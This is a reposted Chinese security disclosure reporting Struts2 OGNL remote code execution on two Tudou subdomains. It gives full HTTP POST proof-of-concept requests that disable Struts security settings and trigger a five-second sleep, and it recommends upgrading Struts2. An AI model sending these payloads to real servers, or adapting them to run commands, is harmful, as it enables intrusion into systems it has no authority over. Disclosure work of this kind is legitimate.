来源:自学PHP网 时间:2015-04-17 14:11 作者: 阅读:次
[导读] 土豆channels.tudou.com频道分站远程代码执行漏洞sleep 5秒测试代码:POST /director/listRecommend.action HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: channels.tudou.comContent-Len......
土豆channels.tudou.com“频道”分站远程代码执行漏洞
sleep 5秒测试代码: POST /director/listRecommend.action HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: channels.tudou.com Content-Length: 258 www.2cto.com ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(d)(('@java.lang.Thread@sleep(5000)')(d)) 土豆survey.tudou.com“调查”分站远程代码执行漏洞 sleep 5秒测试代码: POST /iresearch/tudouCPM_nielsen.action HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: survey.tudou.com Content-Length: 258 ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(d)(('@java.lang.Thread@sleep(5000)')(d)) 修复方案: 更新Struts2至最新官方稳定版 作者 CnCxzSec(衰仔) |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com